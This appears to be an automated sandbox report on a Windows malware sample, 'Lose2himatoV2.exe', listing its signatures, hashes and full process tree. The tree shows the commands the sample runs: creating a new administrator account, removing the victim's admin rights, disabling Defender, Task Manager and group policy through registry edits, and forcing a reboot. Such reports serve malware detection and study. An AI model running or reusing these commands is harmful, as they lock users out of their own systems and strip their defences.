Analysis
-
max time kernel
63s -
max time network
67s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
-
submitted
02-01-2025 15:09
General
-
Target
Lose2himatoV2.exe
-
Size
138.5MB
-
MD5
b13b58171063faf469d7cffd178644a6
-
SHA1
0cc178b5db25710be4181e0f15b70ca8c3049ef2
-
SHA256
974cb763c5670a8c187c5e7108964741b8c59590ac35f3bdccb2e069e2ec7506
-
SHA512
511d96d59fc5646aead6f0bf16ecbe9f9e1ab60e05954b02d2b53c7686df2ccfe85374388fc5aece04e50bd37ff3411319c7107d52cc33c3af819fb47ab570e3
-
SSDEEP
786432:Y93oFjO6NbbB6uTE/kbsV0jmB/gWD4otJ0njnEMIQAhpLoMS/QVQfmLh0VPdTtLH:Y9SjOsbbUng40ihpEX/QVQfmLmxHXutU
Score
9/10
Malware Config
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Disables Task Manager via registry modification
-
Indicator Removal: Network Share Connection Removal 1 TTPs 1 IoCs
Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Detected potential entity reuse from brand PAYPAL.
-
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
-
Browser Information Discovery 1 TTPs
Enumerate browser information.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
-
System Location Discovery: System Language Discovery 1 TTPs 29 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Modifies registry class 2 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 10 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of FindShellTrayWindow 25 IoCs
-
Suspicious use of SendNotifyMessage 24 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\Lose2himatoV2.exe"C:\Users\Admin\AppData\Local\Temp\Lose2himatoV2.exe"1⤵
- Checks computer location settings
- Sets desktop wallpaper using registry
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net user Lose2himato /add2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet user Lose2himato /add3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user Lose2himato /add4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net user Lose2himato dumbass2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet user Lose2himato dumbass3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user Lose2himato dumbass4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net localgroup Administrators "Lose2himato" /add2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet localgroup Administrators "Lose2himato" /add3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administrators "Lose2himato" /add4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net localgroup Administrators "%USERNAME%" /delete2⤵
- Indicator Removal: Network Share Connection Removal
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet localgroup Administrators "Admin" /delete3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administrators "Admin" /delete4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f3⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\explorer.exe"explorer.exe"2⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\MySingleFileApp\wallpaper.bmp /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exeREG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\MySingleFileApp\wallpaper.bmp /f3⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v WallpaperStyle /t REG_SZ /d 3 /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exeREG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v WallpaperStyle /t REG_SZ /d 3 /f3⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exeREG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f3⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableGpedit /t REG_DWORD /d 1 /f2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\reg.exeREG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableGpedit /t REG_DWORD /d 1 /f3⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start https://x.com/Lose2hxm4to2⤵
- System Location Discovery: System Language Discovery
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://x.com/Lose2hxm4to3⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffe01d646f8,0x7ffe01d64708,0x7ffe01d647184⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2152,5640995936744895772,13685687019772089730,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2164 /prefetch:24⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2152,5640995936744895772,13685687019772089730,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2216 /prefetch:34⤵
- Suspicious behavior: EnumeratesProcesses
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start https://discord.gg/UkEYppsAck2⤵
- System Location Discovery: System Language Discovery
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://discord.gg/UkEYppsAck3⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffe01d646f8,0x7ffe01d64708,0x7ffe01d647184⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,18141532828312412677,5323425540477769055,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2112 /prefetch:24⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2088,18141532828312412677,5323425540477769055,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 /prefetch:34⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2088,18141532828312412677,5323425540477769055,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2872 /prefetch:84⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,18141532828312412677,5323425540477769055,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,18141532828312412677,5323425540477769055,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,18141532828312412677,5323425540477769055,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3852 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,18141532828312412677,5323425540477769055,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3740 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,18141532828312412677,5323425540477769055,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4880 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,18141532828312412677,5323425540477769055,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4668 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2088,18141532828312412677,5323425540477769055,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5452 /prefetch:84⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2088,18141532828312412677,5323425540477769055,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5476 /prefetch:84⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,18141532828312412677,5323425540477769055,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5412 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,18141532828312412677,5323425540477769055,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5804 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,18141532828312412677,5323425540477769055,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5948 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,18141532828312412677,5323425540477769055,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5476 /prefetch:14⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start https://www.paypal.com/paypalme/himato6662⤵
- System Location Discovery: System Language Discovery
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.paypal.com/paypalme/himato6663⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0x78,0x128,0x7ffe01d646f8,0x7ffe01d64708,0x7ffe01d647184⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2192,10689396386330413950,17479479407694056820,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2204 /prefetch:24⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2192,10689396386330413950,17479479407694056820,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2268 /prefetch:34⤵
- Suspicious behavior: EnumeratesProcesses
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c shutdown /r2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\shutdown.exeshutdown /r3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
Indicator Removal
1Network Share Connection Removal
1Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
10KB
MD5137cc3abd13ad43c5c4c5a80a60a7f78
SHA1f2d6f1dd8958464fcf9e953c79256d2aa1da50b5
SHA25610b883a9cd595af40f653276a4b2b269b2c136e002ca8e50ee11e4e7a9c41301
SHA512d979bcf05ff715dbf0f00b398a4d0caebb5c2b6ec7c81a8d3caf016b367f3562f0fa7b38441d68c1448a224698c58151e027ec704c17bdcd762be2488783c150
-
Filesize
152B
MD57de1bbdc1f9cf1a58ae1de4951ce8cb9
SHA1010da169e15457c25bd80ef02d76a940c1210301
SHA2566e390bbc0d03a652516705775e8e9a7b7936312a8a5bea407f9d7d9fa99d957e
SHA512e4a33f2128883e71ab41e803e8b55d0ac17cbc51be3bde42bed157df24f10f34ad264f74ef3254dbe30d253aca03158fde21518c2b78aaa05dae8308b1c5f30c
-
Filesize
152B
MD585ba073d7015b6ce7da19235a275f6da
SHA1a23c8c2125e45a0788bac14423ae1f3eab92cf00
SHA2565ad04b8c19bf43b550ad725202f79086168ecccabe791100fba203d9aa27e617
SHA512eb4fd72d7030ea1a25af2b59769b671a5760735fb95d18145f036a8d9e6f42c903b34a7e606046c740c644fab0bb9f5b7335c1869b098f121579e71f10f5a9c3
-
Filesize
4KB
MD597eb68e29f3a2e5d275e4a471612ac9a
SHA130713ced68ae3608baf840ab03b3a47016bac569
SHA256b682e0805ec57d3dbf165f2ef40d45654cd8ece7866cf7660992a8041b509eac
SHA51219e6dccb1a3ff628df44a6af5949137ce9ff581170ac1aa53494b60ca0f146889b4e6ed346a833effde76c1bf17f4a1478562e971f6f0df91cbc0b3993ec30f9
-
Filesize
7KB
MD54fdf6ccdc4e7a93db6e7af6385308170
SHA13906d6c1f05e5f57e846ae705cb0a37c7bb64d86
SHA2560b7120a649f005202d77de3aefd644eacb7a0714ca78ba05899ca4c336068a57
SHA512e0b5f20c7a199f100399452dca9e453d9e67922c5c394d86382baccc95c829933198cfbc3cbf516ec228d03aa17bb88f3aeeae73bbc6994e5238c415623fa3f0
-
Filesize
8KB
MD5874621a0e23fdb64ffa386e3bd0c28c0
SHA19ef4f52b44a4fbbb30a26069bcefcebf9bb156f6
SHA256c5324fc46b84995b8bd83727f73057e03c9df3dcae6fbb096864d1771b968f60
SHA51269f784b8985cbd17ae310f58fce4eb9461c29b11d74ff14b2cb51346dce2054e1e24355a207100e40a7bbda7c2d669447582f8f75b246358c30b648ad4911384
-
Filesize
6KB
MD566fadf06911bca4d4d938e0ff2ad2c5c
SHA1b6d888389b4767a8bfacb27107bd4c825c2b6b99
SHA256eb637075db8a04fcf5ad0f3d581982da1debf3c19e87d033616fb3dba097bf94
SHA51267aa6bbac32d74636b4e50bd094706b258b540ef5ff7463fff204600060fb39536e415e3c3c6233bd261bfd5b117e1ec8b0e50bbbea57705d35add1497ef556c
-
Filesize
2KB
MD5aa9082e2fa60803abea263442ec76adb
SHA15b1605241d790f9e6a74cb534f679f22b469f2f1
SHA25606a41d4632043ba499c005bf23f7b33700db0af40997d7fde5881148fc6ca63b
SHA5120387eb03b32027e01db8b45719083e131680e6132e968f4fbbd764f83d917bcb0d347389457f1c2527d7c3e8cda88d137bd85555cf9e9be6555d5e4ef2784fdd
-
Filesize
2KB
MD577f95b6812f1dab4d31c91ab97cddd50
SHA180c48b38ca9793c3f12bfc46a2097ed2238e1d08
SHA25675b2c4c24dc1a001e28bb3a4539e2278a33438d6bdbf95e20019005dc282744b
SHA512270012c8fc463b773526e7bac40a7f5fa797d266f6dd3a8f1d4b218b7d3335d8ae77903f86dc0a7e356f4b66892fa22f2feef90719c6671d1f67bb6dc7634c7c
-
Filesize
2KB
MD5581d868a536ddb7d6006f9810af45492
SHA1921df7c2d262fc41b2abdca0bdd729b45d9b3614
SHA256394de9cb31274feff39967cf7be35464a53da2a784d98de4d3d81329f904bc89
SHA512d5c5a7703759fe080e004bc32862d0a5b225d8052a535ee305a0603bdbb2d2b20cfb60e009fcf7efa4d3aba3f001744af10858015f1ae7cd4ce3c75fbf0973ae
-
Filesize
2KB
MD58c49985e2de5e042a3e96040ac6e91dd
SHA1be9a332ecb4f03fab22e88bd68263b219b9a9cba
SHA2567b4f8f60a96541ea07ddb9028e364db48ebbf9e4944e3ee0fbba437f3e7252d1
SHA5122a1906ea147f22f2c872b534f22b9acae6693ef176cc63a0169ce070c657aa8218b254424295511926b5e09f2068149460bbe3a2c69fba6b7b652b4024aab757
-
Filesize
10KB
MD543577206517ad6e3ceb32f9d80863ebe
SHA19b8f9e67e7e6b7d0abf9550408e51df7daad234c
SHA256f2a6dc2361d003de28aeb8bad8564d228d58e558e035b6f7dce50c6adb05380b
SHA5120fe96bbf52cf26b2f29313151332a1f5067903060e589001452cec0531aff669bd314aa5c37b2fb310522b716a36e21b735596f8586db60027b138fc5bb64706
-
Filesize
8KB
MD552897eb0dd57863b2714c63bc050a5e8
SHA1a3ad6016a25032e201a458358ae66ed28c09316a
SHA256de3bf436b34fdb05482a06bae686e0ea370235d025304fa739d8b19625c6e346
SHA5120eef6fea7524f3263fb5c6101986915dd2fb3ae210dfa8820bf75d6a366a5719f8a3057986a942ecff087d61ff1ebbfeecdbc18d21c07d1ba4b1e3711c67d662
-
Filesize
8KB
MD56bb8ad9726213a60f31d1cbc02f94191
SHA1ed5dc9fea90be1d87e1d9ccff002f4667235f15e
SHA25656295e36511bdc8b69f146cbad501d7aa89942072a8ab481671a6fa6a97a40cd
SHA512646b5dfda36342c196bec100c7451a5b7f6d3453ccaedd1091f002157c72b4b6209bfed5c5070c0b2458bb9e8b4f4a251fe26f56d42f9fe579d1217c24166193
-
Filesize
72KB
-
Filesize
160KB
-
Filesize
84KB
-
Filesize
84KB
-
Filesize
124KB
-
Filesize
232KB
-
Filesize
232KB
-
Filesize
24KB
-
Filesize
24KB
-
Filesize
720KB
-
Filesize
48KB
-
Filesize
720KB
-
Filesize
48KB
-
Filesize
4KB
-
Filesize
76KB
-
Filesize
124KB
-
Filesize
160KB
-
Filesize
72KB
-
Filesize
4KB
-
Filesize
140KB
-
Filesize
140KB
-
Filesize
76KB
-
Filesize
11.9MB
-
Filesize
256KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
11.9MB
-
Filesize
9.5MB
-
Filesize
9.5MB